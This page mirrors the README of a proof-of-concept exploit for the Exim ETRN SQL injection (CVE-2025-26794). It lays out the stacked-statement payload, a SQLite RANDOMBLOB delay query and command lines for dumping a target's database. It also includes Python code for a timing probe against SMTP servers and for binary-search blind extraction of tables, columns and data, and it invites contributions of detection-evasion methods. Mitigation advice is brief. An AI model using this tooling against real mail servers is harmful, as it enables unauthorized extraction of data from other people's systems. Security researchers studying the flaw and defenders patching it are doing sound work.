POC details: 6f5a6068bb8b837613cca5cb63c91610194d0461

Source
Related vulnerability
Title: Exim security vulnerability (CVE-2025-26794)
Description: Exim is an open-source message transfer agent (MTA) for Unix systems that routes, forwards and delivers mail. Exim versions before 4.98.1 contain a vulnerability: when SQLite hints databases and ETRN serialization are in use, a remote client can perform SQL injection.
Description
SQL injection exploit for CVE-2025-26794 in Exim 4.98. Automated data extraction via time-based blind SQLi. For authorized penetration testing only.
Introduction
# CVE-2025-26794: Exim ETRN SQL Injection Exploit

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-Educational-red)
![Status](https://img.shields.io/badge/status-PoC-orange)

A proof-of-concept exploit tool for CVE-2025-26794, demonstrating the SQL injection in the Exim 4.98 mail server that is reachable through the SMTP ETRN command when Exim keeps its hints databases in SQLite (the "SQLite DBM" backend) and ETRN serialization is enabled.

## ⚠️ Legal Disclaimer

**FOR AUTHORIZED SECURITY TESTING ONLY**

This tool is provided for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal under various laws including:
- Computer Fraud and Abuse Act (CFAA) in the United States
- Computer Misuse Act in the United Kingdom
- Similar legislation in other jurisdictions

**You must have explicit written authorization before testing any system you do not own.**

The authors and contributors assume no liability for misuse or damage caused by this tool.

## 📋 Vulnerability Overview

**CVE-2025-26794** is a SQL injection vulnerability in Exim 4.98 (fixed in 4.98.1) that is reachable when all of the following hold:
- Exim is built to keep its hints databases in SQLite (the "SQLite DBM" backend)
- ETRN serialization is enabled, so the argument of each ETRN command is recorded in that hints database
- The ETRN argument is spliced into the SQL statement as text rather than bound as a parameter, with no sanitization

This vulnerability allows attackers to:
- Extract sensitive data from the mail server database
- Perform time-based blind SQL injection attacks
- Enumerate database structure (tables, columns, data)

### Affected Versions
- Exim 4.98 before 4.98.1, built with the SQLite hints-database backend and running with ETRN serialization enabled

### Attack Vector
- Network-accessible SMTP service (typically port 25)
- No SMTP authentication required: ETRN is issued before any AUTH. The server must still accept ETRN from the client, which Exim decides through its `acl_smtp_etrn` ACL, so a host that refuses ETRN is not reachable this way

## 🚀 Features

- **Vulnerability Testing**: Automated check to confirm if target is vulnerable
- **Time-based Blind SQLi**: Uses SQLite time-delay techniques for data extraction
- **Binary Search Optimization**: Efficient character-by-character extraction
- **Automated Database Dump**: Extracts tables, columns, and sample data
- **Interactive Mode**: Execute custom SQL queries interactively
- **Multi-mode Operation**: Flexible extraction strategies

## 📦 Installation

### Requirements
- Python 3.6 or higher
- Network access to target SMTP server

### Setup

```bash
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# Install dependencies (the script itself uses only the standard library, so this step is optional)
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py
```

## 💻 Usage

### Basic Syntax

```bash
python3 exploit.py <target> [options]
```

### Quick Examples

#### 1. Test if Target is Vulnerable
```bash
python3 exploit.py 192.168.1.10 --test-only
```

#### 2. Automated Database Dump
```bash
python3 exploit.py mail.example.com --auto-dump
```

#### 3. Interactive SQL Query Mode
```bash
python3 exploit.py 10.0.0.5 --interactive
```

#### 4. Extract Specific Table Structure
```bash
python3 exploit.py 192.168.1.10 --table users --columns
```

#### 5. Execute Custom SQL Query
```bash
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
```

### Command-Line Options

| Option | Description |
|--------|-------------|
| `host` | Target hostname or IP address (required) |
| `-p, --port` | SMTP port (default: 25) |
| `-t, --timeout` | Socket timeout in seconds (default: 30) |
| `--threshold` | Time delay threshold for detection (default: 0.8s) |
| `--test-only` | Only test vulnerability, no data extraction |
| `--auto-dump` | Automatically dump database structure and data |
| `--interactive` | Launch interactive SQL query console |
| `--table TABLE` | Target specific table for extraction |
| `--columns` | Extract column names (use with --table) |
| `--query QUERY` | Execute custom SQL query |

## 🔍 How It Works

### Attack Flow

1. **Connection**: Establishes SMTP connection to target server
2. **Baseline Measurement**: Sends normal ETRN command to measure response time
3. **Injection Test**: Sends time-delay SQL payload to confirm vulnerability
4. **Data Extraction**: Uses binary search with time-based blind SQLi to extract data character-by-character
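The four steps above, run offline against a constructed fake SMTP server (an added example, not the repository's `exploit.py`): the client reads the banner, sends EHLO, times a harmless ETRN for a baseline, times the stacked-statement payload, and compares the difference with the tool's default 0.8 s threshold. The fake server, its reply texts and its rule of stalling any ETRN whose argument contains `RANDOMBLOB` are constructed stand-ins for a vulnerable hints-database write; the host names are placeholders.

```python
"""Attack-flow steps 1-4 against a constructed fake SMTP server (added example)."""
import socket
import socketserver
import threading
import time

DELAY_MARKER = b"RANDOMBLOB"
SIMULATED_DELAY = 1.2  # seconds the fake server stalls, standing in for the heavy SQLite query

# The delay query quoted on this page, spliced into the stacked-statement payload.
DELAY_QUERY = b"SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))"
DELAY_PAYLOAD = b"#',1); " + DELAY_QUERY + b" /*"


class FakeSmtpHandler(socketserver.StreamRequestHandler):
    """Minimal ESMTP dialogue: banner, EHLO, ETRN (stalled when the marker is present), QUIT.
    Reply texts are constructed for this demo, not copied from Exim."""

    def handle(self):
        self.wfile.write(b"220 mail.example.test ESMTP (constructed fake)\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            verb, _, arg = line.strip().partition(b" ")
            verb = verb.upper()
            if verb == b"EHLO":
                self.wfile.write(b"250-mail.example.test\r\n250 ETRN\r\n")
            elif verb == b"ETRN":
                if DELAY_MARKER in arg.upper():
                    time.sleep(SIMULATED_DELAY)  # the "vulnerable" path burns time here
                self.wfile.write(b"250 OK, queue run started\r\n")
            elif verb == b"QUIT":
                self.wfile.write(b"221 closing connection\r\n")
                return
            else:
                self.wfile.write(b"500 unrecognised command\r\n")


def start_fake_server():
    """Bind an ephemeral loopback port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSmtpHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def read_reply(rfile):
    """Consume one SMTP reply, including 250-style continuation lines; return the code."""
    while True:
        line = rfile.readline()
        if not line:
            raise ConnectionError("server closed the connection")
        if len(line) >= 4 and line[3:4] != b"-":
            return int(line[:3])


def etrn_roundtrip(host, port, etrn_arg, timeout=30):
    """Step 1 plus one ETRN: returns (reply code, seconds from sending ETRN to its reply)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")
        read_reply(rfile)  # 220 banner
        sock.sendall(b"EHLO probe.example.test\r\n")
        read_reply(rfile)
        t0 = time.perf_counter()
        sock.sendall(b"ETRN " + etrn_arg + b"\r\n")
        code = read_reply(rfile)
        elapsed = time.perf_counter() - t0
        sock.sendall(b"QUIT\r\n")
        read_reply(rfile)
        return code, elapsed


def probe(host, port, threshold=0.8):
    """Steps 2-4's decision: baseline ETRN, then the delay payload; 'vulnerable' if the
    extra latency exceeds the threshold (the tool's --threshold default is 0.8 s)."""
    _, baseline = etrn_roundtrip(host, port, b"#baseline.example.test")
    _, delayed = etrn_roundtrip(host, port, DELAY_PAYLOAD)
    return {"baseline": baseline, "delayed": delayed,
            "vulnerable": (delayed - baseline) > threshold}


def run_offline_demo():
    """Start the fake server, probe it once, shut it down; returns the probe result."""
    server, port = start_fake_server()
    try:
        return probe("127.0.0.1", port)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_offline_demo())
```

Against a real target, `probe()` is the piece that would be pointed at the server. Take the baseline more than once before trusting a single delayed reply: a real ETRN may start a queue run, and that work or network jitter can push an honest reply past the threshold on its own.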

### SQL Injection Payload Structure

```sql
ETRN #',1); <MALICIOUS_QUERY> /*
```

The leading `#` marks the argument as a non-domain ETRN identifier (RFC 1985), the `'` closes the string literal that holds the ETRN key, `,1)` supplies a dummy value to complete the enclosing parenthesized list, `;` ends that statement so the injected query runs as a second statement, and `/*` turns the remainder of the original statement into a comment. The serialization handler neither sanitizes nor parameterizes the argument, so SQLite executes all of this as written.

### Time-Based Detection

SQLite has no `SLEEP()`, so the delay comes from CPU work:
```sql
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
```

Generating a 250 MB random blob, hex-encoding it and upper-casing it before a `LIKE` comparison that can never match costs roughly 1-2 seconds, depending on the hardware. On its own the expression is unconditional; for extraction the tool evaluates it only when the condition under test is true (for example inside a `CASE WHEN ... THEN <heavy> END`), so a delayed reply means "true" and a prompt one means "false". The `--threshold` option (default 0.8 s) sets how much extra latency over the baseline counts as a delay.
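The two sections above, modelled offline with Python's `sqlite3` as an added example (not code from the exploit repository or from Exim): a write that splices the ETRN argument into SQL text beside the parameterized form that cannot be injected, and the page's delay expression wrapped in a condition. The table layout `tbl(ky, dat)` and the `INSERT OR REPLACE` template are assumptions chosen to match the payload prefix `#',1);`; the statement Exim really builds is not reproduced on this page. The PoC stacks a second statement after `);` and comments out the tail with `/*`; because `sqlite3.Cursor.execute()` runs one statement at a time, this example injects a conditional expression into the same key literal instead, which is enough to show both behaviours.

```python
"""Vulnerable string-built hints-DB write vs. a parameterized one (added example)."""
import sqlite3
import time

# Assumed shape of the vulnerable write: key and hex-encoded value spliced into SQL text.
VULN_TEMPLATE = "INSERT OR REPLACE INTO tbl (ky, dat) VALUES ('etrn_{key}', X'{hexval}')"

# The page's delay expression; the blob size is a parameter so the demo runs quickly.
DELAY_EXPR = "1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({blob_bytes}))))"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl (ky TEXT PRIMARY KEY, dat BLOB)")
    return conn


def build_vulnerable_sql(etrn_arg, value=b"\x01"):
    """Concatenate the untrusted ETRN argument straight into the statement text."""
    return VULN_TEMPLATE.format(key=etrn_arg, hexval=value.hex().upper())


def last_key(conn):
    # INSERT OR REPLACE deletes and re-inserts, so the newest write has the highest rowid.
    return conn.execute("SELECT ky FROM tbl ORDER BY rowid DESC LIMIT 1").fetchone()[0]


def store_vulnerable(conn, etrn_arg):
    conn.execute(build_vulnerable_sql(etrn_arg))
    return last_key(conn)


def store_hardened(conn, etrn_arg):
    """Bound parameters: the argument can only ever be data, never SQL."""
    conn.execute("INSERT OR REPLACE INTO tbl (ky, dat) VALUES (?, ?)",
                 ("etrn_" + etrn_arg, b"\x01"))
    return last_key(conn)


def marker_payload(condition_sql):
    """Close the key literal, evaluate a condition, reopen the literal.
    The stored key ends in T or F, so the condition's truth is visible directly."""
    return f"#' || CASE WHEN ({condition_sql}) THEN 'T' ELSE 'F' END || '"


def delay_payload(condition_sql, blob_bytes):
    """Time-based variant: the heavy LIKE/RANDOMBLOB work runs only when the condition holds."""
    heavy = DELAY_EXPR.format(blob_bytes=blob_bytes)
    return f"#' || CASE WHEN ({condition_sql}) THEN ({heavy}) ELSE 0 END || '"


def timed_probe(conn, condition_sql, blob_bytes=20_000_000):
    """Seconds the vulnerable write takes with the delay payload for condition_sql."""
    t0 = time.perf_counter()
    store_vulnerable(conn, delay_payload(condition_sql, blob_bytes))
    return time.perf_counter() - t0


if __name__ == "__main__":
    conn = new_db()
    print("vulnerable, 1=1 :", store_vulnerable(conn, marker_payload("1=1")))  # etrn_#T
    print("vulnerable, 1=2 :", store_vulnerable(conn, marker_payload("1=2")))  # etrn_#F
    print("hardened        :", store_hardened(conn, marker_payload("1=1")))    # payload stored verbatim
    print("delay if true   : %.2fs" % timed_probe(conn, "1=1"))
    print("delay if false  : %.2fs" % timed_probe(conn, "1=2"))
```

The marker variant is only possible here because the demo can read the table back; a remote attacker cannot, which is why the PoC falls back to timing. The hardened write stores the whole payload, quotes and all, as an inert key.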

## 📊 Example Output

```
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email
```

## 🛡️ Mitigation

If you are running Exim 4.98 with SQLite hints databases:

1. **Update Exim**: Upgrade to 4.98.1 or later, the release that fixes CVE-2025-26794. This is the only complete fix; the items below reduce exposure while the upgrade is pending.
2. **Restrict ETRN**: Exim decides whether to accept ETRN through the `acl_smtp_etrn` ACL. Accept the command only from the hosts that genuinely need it.
3. **Disable ETRN serialization**: The vulnerable path requires ETRN serialization; setting `smtp_etrn_serialize = false` keeps the ETRN argument out of the hints database.
4. **Firewall rules**: Restrict SMTP access to trusted networks where the server's role allows it.
5. **Code-level fixes**: Validating the ETRN argument and using parameterized queries for the hints-database write are changes inside Exim that the 4.98.1 release delivers; they are not available as configuration options.

## 🔧 Technical Details

### Binary Search Algorithm

The exploit uses binary search to extract each character with the fewest yes/no questions:
- Search space: printable ASCII, code points 32-126 (95 values)
- Queries per character: at most 7 (⌈log₂ 95⌉), each one a separate ETRN round trip whose response time answers a single comparison
- Far fewer round trips than a linear scan of the alphabet, which keeps both runtime and network traffic low

### SQLite Functions Used

- `unicode()`: returns the code point of the first character of its argument, so a character can be compared numerically
- `substr()`: selects the character at a given position of the value being extracted
- `sqlite_master`: the system table listing every table and index, used to enumerate table names
- `pragma_table_info()`: the table-valued form of `PRAGMA table_info`, used to enumerate a table's column names
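The extraction algorithm and the SQLite functions listed above, run offline against a constructed database (an added example, not the repository's `exploit.py`). The oracle here answers each SQL condition directly; in the real attack the same condition would be wrapped in the time-delay payload and its truth read off the response time. The `users` table and its single row are constructed to match the example output earlier on the page.

```python
"""Binary-search blind extraction over a boolean oracle (added example)."""
import sqlite3

# Constructed sample data: the hints table plus a table like the one in the example output.
SAMPLE_SCHEMA = (
    "CREATE TABLE tbl (ky TEXT PRIMARY KEY, dat BLOB)",
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)",
    "INSERT INTO users (username, email) VALUES ('alice', 'alice@example.com')",
)


def build_sample_db():
    conn = sqlite3.connect(":memory:")
    for stmt in SAMPLE_SCHEMA:
        conn.execute(stmt)
    return conn


def make_oracle(conn):
    """Truth oracle: stands in for 'did the ETRN reply arrive late?'."""
    def oracle(condition):
        return conn.execute(f"SELECT ({condition})").fetchone()[0] == 1
    return oracle


class CountingOracle:
    """Wraps an oracle and counts the questions asked (one network round trip each)."""
    def __init__(self, oracle):
        self.oracle, self.queries = oracle, 0

    def __call__(self, condition):
        self.queries += 1
        return self.oracle(condition)


def extract_length(oracle, expr, max_len=256):
    """Binary search for length(expr); a NULL result (no such row) yields 0."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({expr})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_char(oracle, expr, pos):
    """Binary search over printable ASCII 32..126: at most 7 questions per character."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr(({expr}),{pos},1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(oracle, expr):
    """expr is a scalar SELECT; returns its value, assumed to be printable ASCII."""
    n = extract_length(oracle, expr)
    return "".join(extract_char(oracle, expr, i) for i in range(1, n + 1))


def list_tables(oracle):
    """Schema enumeration via sqlite_master, one row per OFFSET until none is left."""
    names = []
    while True:
        expr = ("SELECT name FROM sqlite_master WHERE type='table' "
                f"AND name NOT LIKE 'sqlite_%' ORDER BY name LIMIT 1 OFFSET {len(names)}")
        name = extract_string(oracle, expr)
        if not name:
            return names
        names.append(name)


def list_columns(oracle, table):
    """Column names via the pragma_table_info() table-valued function, in cid order."""
    cols = []
    while True:
        expr = f"SELECT name FROM pragma_table_info('{table}') ORDER BY cid LIMIT 1 OFFSET {len(cols)}"
        col = extract_string(oracle, expr)
        if not col:
            return cols
        cols.append(col)


if __name__ == "__main__":
    oracle = CountingOracle(make_oracle(build_sample_db()))
    for table in list_tables(oracle):
        print(table, list_columns(oracle, table))
    print(extract_string(oracle, "SELECT username FROM users LIMIT 1"), "in", oracle.queries, "queries")
```

Swap `make_oracle` for a function that sends the condition inside the delay payload and returns whether the reply was late, and the rest of the code is the network attack. Each string costs one length search plus at most seven round trips per character, so a five-character value such as `alice` needs no more than 43 questions.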

## 📚 References

- **CVE Details**: [CVE-2025-26794](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26794)
- **Exim Security Advisory**: [Official Exim Advisory]
- **OWASP SQL Injection**: [OWASP Guide](https://owasp.org/www-community/attacks/SQL_Injection)

## 🤝 Contributing

Contributions are welcome for:
- Performance optimizations
- Additional extraction techniques
- Detection evasion methods
- Bug fixes and improvements

Please ensure all contributions include:
- Clear documentation
- Responsible disclosure guidelines
- Legal usage warnings

## 📝 License

This project is released for educational purposes only. Use responsibly and legally.

## 👤 Author

**XploitGh0st**

- GitHub: [@XploitGh0st](https://github.com/XploitGh0st)

## 🙏 Acknowledgments

- Exim development team for responsible vulnerability handling
- Security research community
- SQLite time-based injection technique researchers

## ⚖️ Responsible Disclosure

If you discover vulnerabilities using this tool:
1. Do not publicly disclose details immediately
2. Contact the vendor/maintainer privately
3. Allow reasonable time for patching (typically 90 days)
4. Follow coordinated disclosure guidelines

---

**Remember: With great power comes great responsibility. Use this tool ethically and legally.**
File snapshot

[4.0K] /data/pocs/6f5a6068bb8b837613cca5cb63c91610194d0461
├── [ 15K] exploit.py
├── [7.5K] README.md
└── [ 457] requirements.txt
0 directories, 3 files
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the POC through its source.
    2. If the source is unavailable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has taken a snapshot of the POC code; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.